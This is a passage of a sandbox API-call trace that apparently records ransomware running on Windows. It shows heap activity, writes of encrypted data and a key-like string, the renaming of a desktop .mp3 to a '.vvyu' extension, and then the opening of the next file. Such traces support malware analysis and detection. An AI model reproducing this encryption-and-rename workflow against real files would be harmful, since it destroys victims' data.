[0192.011] GetLastError () returned 0x0 [0192.011] SetLastError (dwErrCode=0x0) [0192.011] GetLastError () returned 0x0 [0192.011] SetLastError (dwErrCode=0x0) [0192.011] GetLastError () returned 0x0 [0192.012] SetLastError (dwErrCode=0x0) [0192.012] GetLastError () returned 0x0 [0192.012] SetLastError (dwErrCode=0x0) [0192.012] GetLastError () returned 0x0 [0192.012] SetLastError (dwErrCode=0x0) [0192.012] GetLastError () returned 0x0 [0192.012] SetLastError (dwErrCode=0x0) [0192.012] GetLastError () returned 0x0 [0192.012] SetLastError (dwErrCode=0x0) [0192.012] GetLastError () returned 0x0 [0192.012] SetLastError (dwErrCode=0x0) [0192.012] GetLastError () returned 0x0 [0192.012] SetLastError (dwErrCode=0x0) [0192.012] GetLastError () returned 0x0 [0192.012] SetLastError (dwErrCode=0x0) [0192.012] GetLastError () returned 0x0 [0192.012] SetLastError (dwErrCode=0x0) [0192.012] GetLastError () returned 0x0 [0192.012] SetLastError (dwErrCode=0x0) [0192.012] GetLastError () returned 0x0 [0192.012] SetLastError (dwErrCode=0x0) [0192.012] GetLastError () returned 0x0 [0192.012] SetLastError (dwErrCode=0x0) [0192.012] GetLastError () returned 0x0 [0192.013] SetLastError (dwErrCode=0x0) [0192.013] GetLastError () returned 0x0 [0192.013] SetLastError (dwErrCode=0x0) [0192.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.013] GetLastError () returned 0x0 [0192.013] SetLastError (dwErrCode=0x0) [0192.013] GetLastError () returned 0x0 [0192.013] SetLastError (dwErrCode=0x0) [0192.013] GetLastError () returned 0x0 [0192.013] SetLastError (dwErrCode=0x0) [0192.013] GetLastError () returned 0x0 [0192.013] SetLastError (dwErrCode=0x0) [0192.013] GetLastError () returned 0x0 [0192.013] SetLastError (dwErrCode=0x0) [0192.013] GetLastError () returned 0x0 [0192.013] SetLastError (dwErrCode=0x0) [0192.013] GetLastError () returned 0x0 [0192.013] SetLastError (dwErrCode=0x0) [0192.013] GetLastError () returned 0x0 [0192.013] SetLastError (dwErrCode=0x0) [0192.013] GetLastError () returned 0x0 [0192.014] SetLastError (dwErrCode=0x0) [0192.014] GetLastError () returned 0x0 [0192.014] SetLastError (dwErrCode=0x0) [0192.014] GetLastError () returned 0x0 [0192.014] SetLastError (dwErrCode=0x0) [0192.014] GetLastError () returned 0x0 [0192.014] SetLastError (dwErrCode=0x0) [0192.014] GetLastError () returned 0x0 [0192.014] SetLastError (dwErrCode=0x0) [0192.014] GetLastError () returned 0x0 [0192.014] SetLastError (dwErrCode=0x0) [0192.014] GetLastError () returned 0x0 [0192.014] SetLastError (dwErrCode=0x0) [0192.014] GetLastError () returned 0x0 [0192.014] SetLastError (dwErrCode=0x0) [0192.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.015] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.015] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.015] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.015] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.015] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5bd0) returned 0x2e96a68 [0192.016] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94d98 [0192.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93480 [0192.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94d50 [0192.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93498 [0192.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93450 [0192.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93510 [0192.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93570 [0192.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x655b18 [0192.016] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x655b18, Size=0x218) returned 0x2e9c640 [0192.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e9c860 [0192.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93450 | out: hHeap=0x620000) returned 1 [0192.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93570 | out: hHeap=0x620000) returned 1 [0192.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9c860 | out: hHeap=0x620000) returned 1 [0192.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93510 [0192.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0192.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93570 [0192.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93450 [0192.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0192.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2e914a8 [0192.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0192.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0192.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0192.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93570 | out: hHeap=0x620000) returned 1 [0192.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93450 | out: hHeap=0x620000) returned 1 [0192.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9c640 | out: hHeap=0x620000) returned 1 [0192.020] GetCurrentThreadId () returned 0x66c [0192.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64de70 [0192.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.020] GetCurrentThreadId () returned 0x66c [0192.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccadf0 [0192.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93510 [0192.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93450 [0192.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93570 [0192.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934e0 [0192.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93528 [0192.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0192.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934f8 [0192.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934c8 [0192.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93540 [0192.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0192.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934c8 [0192.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0192.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93450 | out: hHeap=0x620000) returned 1 [0192.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93450 [0192.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e9c640 [0192.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0192.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e9c850 [0192.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2e914a8 [0192.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0192.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93450 | out: hHeap=0x620000) returned 1 [0192.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e9ca68 [0192.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9c850 | out: hHeap=0x620000) returned 1 [0192.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ca68 | out: hHeap=0x620000) returned 1 [0192.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0192.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93570 | out: hHeap=0x620000) returned 1 [0192.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934e0 | out: hHeap=0x620000) returned 1 [0192.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93498 | out: hHeap=0x620000) returned 1 [0192.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94d50 | out: hHeap=0x620000) returned 1 [0192.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9c640 | out: hHeap=0x620000) returned 1 [0192.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0192.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0192.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.032] WriteFile (in: hFile=0x568, lpBuffer=0x2e96a68*, nNumberOfBytesToWrite=0x5bc7, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e96a68*, lpNumberOfBytesWritten=0x312fb14*=0x5bc7, lpOverlapped=0x0) returned 1 [0192.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.033] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5bcc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.034] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e96a68 [0192.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e96a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e96e98 [0192.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.035] WriteFile (in: hFile=0x568, lpBuffer=0x2e96e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e96e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96e98 | out: hHeap=0x620000) returned 1 [0192.035] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.035] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.036] CloseHandle (hObject=0x568) returned 1 [0192.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0192.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2e96a68 [0192.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0192.037] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\2twJZ0dzmRfJrmP6B.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\2twjz0dzmrfjrmp6b.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\2twJZ0dzmRfJrmP6B.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\2twjz0dzmrfjrmp6b.mp3.vvyu")) returned 1 [0192.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.038] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0192.041] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e6ce890, ftCreationTime.dwHighDateTime=0x1d899d3, ftLastAccessTime.dwLowDateTime=0xd1e98ec0, ftLastAccessTime.dwHighDateTime=0x1d89ff8, ftLastWriteTime.dwLowDateTime=0xd1e98ec0, ftLastWriteTime.dwHighDateTime=0x1d89ff8, nFileSizeHigh=0x0, nFileSizeLow=0xaa39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2UV3oZuGwQu6CYc7-L.swf", cAlternateFileName="2UV3OZ~1.SWF")) returned 1 [0192.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94d50 [0192.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0192.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94d50 | out: hHeap=0x620000) returned 1 [0192.042] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\2UV3oZuGwQu6CYc7-L.swf") returned=".swf" [0192.042] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\2UV3oZuGwQu6CYc7-L.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\2uv3ozugwqu6cyc7-l.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.042] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=43577) returned 1 [0192.042] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.046] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xaa13, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.046] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.048] HeapFree (in: hHeap=0x620000, 